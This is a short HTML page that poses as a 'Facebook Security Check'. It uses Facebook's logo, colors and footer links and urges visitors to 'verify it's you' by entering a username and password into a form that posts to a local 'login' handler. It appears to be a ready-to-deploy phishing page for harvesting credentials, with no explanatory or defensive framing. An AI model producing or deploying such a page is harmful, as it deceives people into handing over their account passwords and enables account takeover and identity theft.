<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"/>
<title>Security Check</title>
<link href="./fb-ico.png" rel="shortcut icon" type="ico"/>
<link href="style.css" rel="stylesheet" type="text/css"/>
</head>
<body>
<header>
<div class="main-header">
<div class="logo">
<a href="http://www.facebook.com"><img src="./logo.png"/></a>
</div>
</div>
</header>
<section>
<div class="form">
<div class="m-header">
<h3>Facebook Security Check. Please Verify It's You.</h3>
</div>
<div class="red-box">
<p style="font-weight:bold; font-size:13px">Verify needed to understand it's you</p>
<p>Enter your password for security reason (make sure your caps lock is off)</p>
<p>Forgot your password ? <a href="">Request new one</a>
</p></div>
<div class="login-form">
<form action="login" class="bb" id="login-form" method="post" novalidate="1">
<label for="username">Username:</label><input id="username" name="username" type="username"/><br/>
<br/> <br/>
<label for="password">Password:</label><input id="password" name="password" type="password"/><br/>
<input id="keep" style="margin: 10px 0 0 84px" type="checkbox"/>
<label for="keep" style="font-size:12px;">keep me logged in</label><br/>
<input name="submit" style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461; color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;" type="submit" value="Verify"/>
<p><a href="" style="text-decoration:none; color:#3B5998; margin:0 0 0 80px;">can't log in?</a></p>
</form>
</div>
</div>
<footer>
<ul>
<li><a href="">Mobile</a></li>
<li><a href="">Find Friends</a></li>
<li><a href="">Badges</a></li>
<li><a href="">People</a></li>
<li><a href="">Pages</a></li>
<li><a href="">Apps</a></li>
<li><a href="">Games</a></li>
<li><a href="">Music</a></li>
<li><a href="">Locations</a></li>
</ul>
<ul>
<li><a href="">Topics</a></li>
<li><a href="">About</a></li>
<li><a href="">Create Ad</a></li>
<li><a href="">Create Page</a></li>
<li><a href="">Devepers</a></li>
<li><a href="">Careers</a></li>
<li><a href="">Privacy</a></li>
<li><a href="">Cookies</a></li>
<li><a href="">Terms</a></li><br/>
<li><a href="">Help</a></li>
</ul>
</footer>
</section>
</body>
</html>
